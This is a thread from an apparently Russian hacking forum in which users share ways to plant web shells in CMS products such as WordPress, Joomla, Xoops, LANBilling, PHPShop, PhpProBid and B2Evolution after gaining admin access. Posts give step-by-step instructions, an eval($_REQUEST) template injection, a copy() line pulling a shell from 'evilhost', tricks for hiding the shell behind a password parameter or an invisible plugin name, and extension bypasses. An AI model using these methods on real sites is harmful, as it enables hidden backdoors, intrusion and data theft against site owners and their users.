Старый 27.08.2012, 21:19   #41
HACKERSMARSA
 
Регистрация: 26.08.2012
Сообщений: 7
Репутация: 2
По умолчанию

Заливка шелла в CMS "2z project".
Требования: Аккаунт администратора
Переходим в панель управления (http://localhost/2zproject1/2z/admin.php?mod=configuration) и нажимаем на вкладку "файлы"
В список разрешенных расишерний файлов добавляем php
zip, rar, gz, tgz, bz2, php
Если нужно,ниже ставим размер подходящий для нашего шелла.
Далее добавляем новость из админки (http://localhost/2zproject1/2z/admin.php?mod=addnews)
Нажимаем "вставить файл",выбираем наш шелл и загружаем
смотрим в списке файлов (http://localhost/2zproject1/2z/admin.php?mod=files)
там должен быть наш шелл,сам шелл после загрузки на сервер будет доступен по адрессу:
http://localhost/2zproject1/uploads/files/default/image.php
HACKERSMARSA вне форума   Ответить с цитированием
Старый 27.11.2012, 12:20   #42
NickStone
 
Регистрация: 26.11.2012
Сообщений: 1
Репутация: 1
По умолчанию WordPress - все способы заливки веб-шелла

В цикле сообщений буду писать о актуальных способах заливки веб-шелла на WP, а так же наработок к последней версии(3.4.2) и ниже.

1. WordPress <=3.4.2 заливка веб-шелла через "редактор файлов":
Требование: Права администратора блога, доступ в администраторскую панель блога
Инструкция:
Для начала нам нужно перейти в редактор файлов. Сделать вы это можете, либо перейдя по адресу "/wp-admin/theme-editor.php", либо в меню "Внешний вид -> Редактор":
В правой стороне сайта, перед вами будет блистать кликабельные ссылки на редактирование шаблонов/файлов сайта. Соответственно наша цель редактировать любой из файлов так, чтобы на сайте это ни как не отразилось, для этого мы будем использовать шаблон ошибки 404 (404.php).
Наверное, у вас должен возникнуть вопрос, как это можно назвать безпалевным редактированием, ведь не кто не отменял изменение ссылки или удаление поста, что привело бы к выводу этого самого файла. Да вы правы, мы можем очень крупно пожелеть если при каждом переходе на несуществующую страницу пользователь будет видеть наш шелл, чтобы этого избежать мы введем GET переменную, можете назвать ее паролем, она будет проводником к нашему шеллу, если этой переменной не будет, то пользователь будет смотреть на родную страницу 404 ошибки. Пишем такой вот код:
PHP код:
if(!isset($_GET['password'])) {
    
// код шаблона 404 ошибки, который был в этом файле изначально
} else {
    
// код нашего шелла

Соответственно заменяем комментарии в коде, например на тот же wso, и получаем шелл.


2. WordPress <=3.4.2 заливка веб-шелла через "редактор плагинов":
Требование: Права администратора блога, доступ в администраторскую панель блога
Инструкция:
Для начала нам нужно перейти в редактор файлов. Сделать вы это можете, либо перейдя по адресу "/wp-admin/theme-editor.php", либо в меню "Плагины -> Добавить новый":
Смысл этого способы прост - Вам нужно загрузить новый плагин через форму в zip формате. Здесь есть два решения, либо вы берете и вставляете ваш шелл файл в любой из уже существующих плагинов, либо же вы создаете свой плагин и херачить туда шелл. И тот и этот вариант индентичны, но мне кажется интерснее было бы создать свой - шелл плагин! :-) Для этого вам нужно создать папку, например с названием "shell", поместисть в нее файл с вашим шеллом, и в самый вверх этого "плгина" вставить код:
PHP код:
/* 
    Plugin Name:*****   
    Plugin URI:*****    
    Description:****    
    Author:***     
    Version:***      
*/ 
Здесь перед вами встает два пути: написать ложную информацию в эти строки, типа "Plugin Name: Social share". и т.п., либо сделать эту информацию невидимой, как пример:
Здесь, вы видите установленный плагин без инфы - наш шелл, но вот в чем подвох, если просто эту информацию в исходнике плагинов не заполнять или заполнить пробелами, то WP это распознает и не даст загрузится плагинов. Здесь нам на помощь приходят стандартный набор программ в WIN, "таблица символов" (Меня Пуск -> Стандартные -> Служебные), там ищем пустой знак:
Копируем его там, и вставляем несколько раз как инфу в плагине(исходнике) и получаем шелл. Кстати если делать как мы сейчас (создаем свой плагин), и не будем прикреплять наш плагин к к какой-то части сайта (пример, wp_footer()), то мы увидем вот такую вещь в администраторской панели:
Отсюда два пути, либо быстро залить шелл в другую диру, и потом тупо к нему обращаться, либо же прикреплять шелл к какой то части сайта (добавлять в фильтр), тогда такого мы не увидим.

Последний раз редактировалось NickStone; 28.11.2012 в 14:36..
NickStone вне форума   Ответить с цитированием
Старый 11.01.2013, 14:22   #43
BigBear
 
Регистрация: 26.07.2012
Сообщений: 134
Репутация: 51
По умолчанию

LANBilling

Сайт разработчиков - _ttp://www.lanbilling.ru

1 способ (нашёл ReVOLVeR)

Цитата:
1)создаем новый шаблон "Отчетов"
2)в нем свой шелл
3)поставим этот шаблон дефолтным
4)генеририруем отчет.

*Отчет инклудит в себя шаблон.Получаем шелл.
Конфиги к бд в /etc/billing.conf

2 способ найденный мной

Цитата:
1) Цепляемся в админку
2) Переходим в Шаблоны документов
3) льём шелл без ограничений (расширения php, php3, phtml и тд и тп)
4) Заходим в созданный шаблон. При наведении на созданный файл видим что-то вроде javascript:EditTemplate(№)
5) Обращаемся к шеллу напрямую используя его серийный номер и расширение.

Например
http://site/admin/templates/tmpl_№.php
http://site/admin/templates/tmpl_№.phtml

смотря от расширения.
Проверено на версии 1.8

Возможно сработает и на других версиях.
BigBear вне форума   Ответить с цитированием
Старый 11.01.2013, 19:24   #44
ReV
 
Регистрация: 08.01.2013
Сообщений: 1
Репутация: 0
По умолчанию Видео

Видео показывающее процесс заливки в LANBilling 1.8
Методом описанным выше.
_ttp://priv8.ru/3.webm
ReV вне форума   Ответить с цитированием
Старый 01.02.2013, 00:13   #45
faza02
 
Аватар для faza02
 
Регистрация: 24.12.2010
Сообщений: 77
Репутация: 14
По умолчанию

Xoops
Идем в админку -> Модули -> Система -> Шаблоны -> Выбираем текущий шаблон -> theme.html.
В него можно вставить php-код между тегами <{php}> evil($_GET[e]); <{/php}>

© Ereee
faza02 вне форума   Ответить с цитированием
Старый 04.02.2013, 07:42   #46
banana
 
Аватар для banana
 
Регистрация: 05.07.2010
Сообщений: 29
Репутация: 3
По умолчанию

Цитата:
Сообщение от Ctacok Посмотреть сообщение
Joomla.
1001 способ
Нужны права админа.
Идём в Extensions -> Install/Uninstall

Нас интересует поле:
Install from URL (Тоже самое и с upload packade file (Ручная заливка))
Вбиваем туда http://your_site.com/dir/shell.php
shell.php обязательно должен быть в text/plain и с расширением .php
Жмём install.
Получаем ошибку :

Да нам всё равно как-то, идём /tmp/shell.php
Спасибо за внимание.
PHP код:
function _getPackageFromUrl()
    {
        
// Get a database connector
        
$db = & JFactory::getDBO();

        
// Get the URL of the package to install
        
$url JRequest::getString('install_url');

        
// Did you give us a URL?
        
if (!$url) {
            
JError::raiseWarning('SOME_ERROR_CODE'JText::_('Please enter a URL'));
            return 
false;
        }

        
// Download the package at the URL given
        
$p_file JInstallerHelper::downloadPackage($url);

        
// Was the package downloaded?
        
if (!$p_file) {
            
JError::raiseWarning('SOME_ERROR_CODE'JText::_('Invalid URL'));
            return 
false;
        }

        
$config =& JFactory::getConfig();
        
$tmp_dest     $config->getValue('config.tmp_path');

        
// Unpack the downloaded package file
        
$package JInstallerHelper::unpack($tmp_dest.DS.$p_file);

        return 
$package;
    } 
Уязвимость присутствует из-за того, когда файл помещается в tmp, он по окончанию установки (ошибки) не удаляется.
Когда нет загрузчика, а льется через Upload Package File, шелл также помещается в tmp. Тестировано на 1.5.26.
banana вне форума   Ответить с цитированием
Старый 01.03.2013, 18:48   #47
nemaniak
 
Регистрация: 14.01.2011
Сообщений: 2
Репутация: 1
По умолчанию

PhpProBid v. 6.10
Оф. сайт: phpprobid.com
Нужны права админа.

Способ №1:
- Заходим в админку, далее Categories -> Edit Category Language Files (Категории -> Редактировать файлы языков категорий);
- Выбираем язык для редактирования, очень желательно не текущий;
- В правой колонке правим php файл языка, вставляем свой код, сохраняем изменения и сверху видим сообщение о успешности и путь файла языка;
- Переходим по вышеуказанному пути и видим исполнение кода.

Способ №2: (Работает не всегда)
- Опять же в админке, переходим в General Settings -> Digital Downloads (Основные настройки -> Цифровые загрузки):
- Ставим галку в Enable Digital Downloads и выставляем в Maximum file size 1000000 KBytes, сохраняем;
- Далее заходим от лица любого юзера в Users Management -> Login as Site User (Управление пользователями -> Войти как пользователь сайта) и создаем новый аукцион;
- Заполняем все поля и жмем Next step;
- Теперь опускаемся вниз к пункту Digital Goods и загружаем свой файл;
- Теперь нужно узнать номер аукциона, это можно сделать, как отследив снифером Post данные и глянув в переменную item_id, так и, например, дойти до Preview и узнать номер в Auction ID;
- Наш шелл будет лежать по следующему пути site.com/dd_folder/dd_A_[номер аукциона]_[название файла].img, например, site.com/dd_folder/dd_A_100006_shell.php.img, причем при переходе на него шелл исполняется за счет предрасширения php.
nemaniak вне форума   Ответить с цитированием
Старый 01.03.2013, 18:49   #48
nemaniak
 
Регистрация: 14.01.2011
Сообщений: 2
Репутация: 1
По умолчанию

B2Evolution <= 2.4.6 (Возможно и более поздние версии)
Оф. сайт: b2evolution.net
Нужны права админа.

- В админке переходим сразу в раздел Upload (в верхнем меню);
- Если попробуем загрузить php (php3, php4 и т.д.), то система нам любезно ответит, что загрузка данного типа файлов запрещена. Переименовываем наш злоскрипт в картинку, что-то типо test.jpg и грузим;
- Переименовываем картинку обратно в файл с расширением php с помощью Rename в разделе Actions, на это нам система молчит;
- Грузим файл напрямую, он будет по след. пути http://site.com/blogs/media/users/[имя админа]/test.php, например, http://site.com/blogs/media/users/admintest/test.php.
nemaniak вне форума   Ответить с цитированием
Старый 12.03.2013, 00:33   #49
Take_IT
 
Регистрация: 11.03.2013
Сообщений: 4
Репутация: 4
По умолчанию

PHPShop & PHPShop CMS Free - Latest Version

Developers - phpshop.ru , cms.phpshopcms.ru
Need: Admin Access
Admin url: /phpshop/admpanel/

Заходим в редактор .tpl шаблонов. Выбираем тему с шаблоном которой будем работать, можно выбрать текущую тему, например "gray"

Выбираем файл шаблона, например файл шаблона для главной страницы "main/index.tpl"

Внедряем свой код
PHP код:
@php
eval($_REQUEST[e]);
php
Смотрим абсолютный путь:
Код:
localhost/?e=phpinfo();
Льем шелл:
Код:
localhost/?e=copy("evilhost/shell.txt","/home/yoursite/phpshop/templates/gray/main/shell.php");


Asterix CMS

Developers - asterix.opendev.ru
Need: Admin Access
Admin url: localhost/admin.html

Шелл с расширением .PHP спокойно заливается через любую форму аплоада картинок, а также через встроенный текстовый редактор CKEditor
Take_IT вне форума   Ответить с цитированием
Старый 02.06.2013, 04:01   #50
}{оттабыч
Banned
 
Регистрация: 08.10.2010
Сообщений: 188
Репутация: 53
По умолчанию

Mojomor 1.2.1
http://ellislab.com/mojomotor
проприетарный двиг, вобщем по дефолту можно лить любой файл с редактора CKEditor 3.6.3 (который вкручен в двиг!).

В контролере Editor екшн Upload()
PHP код:
...if ($upload_settings['allowed_types'] == 'all')
        {
            
$config['allowed_types'] = '*';
        }
        else
        {
            
// jpg are sometimes "jpe" or "jpeg" so allow those also
            
$config['allowed_types'] = 'gif|png|jpg|jpeg|jpe';
        }... 
В бд в таблице mojo_upload_prefs allowed_types как раз All

ps для управление контентом нужны права
}{оттабыч вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot